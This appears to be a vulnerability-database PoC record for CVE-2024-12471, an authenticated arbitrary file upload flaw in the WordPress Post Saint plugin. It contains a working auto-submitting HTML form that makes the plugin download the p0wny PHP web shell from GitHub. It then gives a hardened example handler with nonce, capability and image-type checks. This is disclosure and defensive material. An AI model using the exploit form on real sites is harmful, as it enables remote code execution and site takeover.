PoC details: 68092965a4f4e51d356020e68c12eaebb9e1143b

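Related vulnerability
Title: WordPress plugin Post Saint code injection vulnerability (CVE-2024-12471)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Post Saint version 1.3.1 and earlier contain a code injection vulnerability. The vulnerability stems from the add_image_to_library function lacking a capability check and file type validation, which leads to arbitrary file upload.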
Description
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload
Introduction
# CVE-2024-12471
Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

# Description

The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check and missing file type validation in the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: post-saint
- **Affected Version**: 1.3.1
- **CVSS Score**: 8.8
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12471
- **Status**: Closed

POC
---
```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="add&#95;image&#95;to&#95;library" />
      <input type="hidden" name="image&#95;url" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;flozz&#47;p0wny&#45;shell&#47;refs&#47;heads&#47;master&#47;shell&#46;php" />
      <input type="hidden" name="image&#95;prompt" value="say&#32;hello" />
      <input type="hidden" name="insert&#95;prompt&#95;media&#95;library&#95;fields" value="caption&#95;description" />
      <input type="hidden" name="image&#95;generator" value="pexels" />
      <input type="hidden" name="log&#95;id" value="1667" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
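
A handler with the two checks the description says are missing, as an added example in PHP (not the Post Saint plugin's code or its actual fix). The function name, nonce action and image allow-list are assumptions; the AJAX action and the `image_url` parameter are taken from the PoC form above.

```php
<?php
// Added example, not the Post Saint plugin's code. Function name, nonce action
// and allow-list are assumptions; action and parameter names come from the PoC.
add_action( 'wp_ajax_add_image_to_library', 'example_add_image_to_library' );

function example_add_image_to_library() {
    // 1. CSRF: reject requests without a valid nonce (the PoC form sends none).
    check_ajax_referer( 'example_add_image', 'nonce' );

    // 2. Authorization: the default subscriber role lacks upload_files.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Accept only URLs that pass WordPress's own HTTP URL validation.
    $url = isset( $_POST['image_url'] ) ? esc_url_raw( wp_unslash( $_POST['image_url'] ) ) : '';
    if ( ! $url || ! wp_http_validate_url( $url ) ) {
        wp_send_json_error( 'bad url', 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';
    $tmp = download_url( $url ); // fetched to a temporary file first
    if ( is_wp_error( $tmp ) ) {
        wp_send_json_error( 'download failed', 502 );
    }

    // 4. File type: extension and content must both match an image allow-list.
    $allowed = array( 'jpg|jpeg' => 'image/jpeg', 'png' => 'image/png', 'webp' => 'image/webp' );
    $name    = wp_basename( (string) wp_parse_url( $url, PHP_URL_PATH ) );
    $check   = wp_check_filetype_and_ext( $tmp, $name, $allowed );
    if ( ! $check['ext'] || ! $check['type'] || false === @getimagesize( $tmp ) ) {
        @unlink( $tmp );
        wp_send_json_error( 'not an image', 415 );
    }

    // 5. Store under a server-chosen name that carries the verified extension.
    $file = array( 'name' => wp_generate_uuid4() . '.' . $check['ext'], 'tmp_name' => $tmp );
    $id   = media_handle_sideload( $file, 0 );
    if ( is_wp_error( $id ) ) {
        @unlink( $tmp );
        wp_send_json_error( 'store failed', 500 );
    }
    wp_send_json_success( array( 'attachment_id' => $id ) );
}
```

With these checks the request in the PoC fails at step 1 (no nonce), a subscriber session fails at step 2, and a `.php` URL fails at step 4.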
File snapshot

```
[4.0K] /data/pocs/68092965a4f4e51d356020e68c12eaebb9e1143b
└── [1.8K] README.md

0 directories, 1 file
```